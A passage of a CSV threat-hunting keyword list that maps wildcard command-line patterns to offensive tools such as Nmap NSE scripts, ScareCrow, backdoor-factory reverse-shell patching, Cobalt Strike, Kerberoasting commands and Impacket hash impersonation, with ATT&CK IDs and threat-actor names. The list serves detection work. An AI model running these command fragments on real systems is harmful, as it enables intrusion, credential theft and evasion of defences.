auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2011-3192.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2011-3368.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2012-1823.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2013-0156.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2013-6786.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2013-7091.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2126.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2127.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2128.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2129.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-3704.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-8877.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2015-1427.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2015-1635.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-1001000.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" +"* http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-waf-fingerprint.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-webdav-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-wordpress-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-wordpress-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-wordpress-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -I *.bin * -Loader dll*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -i havex.profile *","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z"
+"* -i snmp-ips.txt -c community.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z"
+"* iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* iax2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* icap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"* -Identity * -Set @{serviceprincipalname='*'}*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -Identity * -XOR @{useraccountcontrol=4194304*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* iec-identify.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
+"* ike-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -im amass -ir *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -im get-dns-records*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -im github-get-repositories*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -im google-get-linkedIn-employees*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -im grep-through-commits*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -im massdns*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* imaohw*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* imap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* imap-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* imap-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z"
+"* imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* impacket *","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z"
+"* impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* impacket*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"* impacket.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"* impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* --impersonate Administrator -shell *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -impersonate* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -ImpersonateUser *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 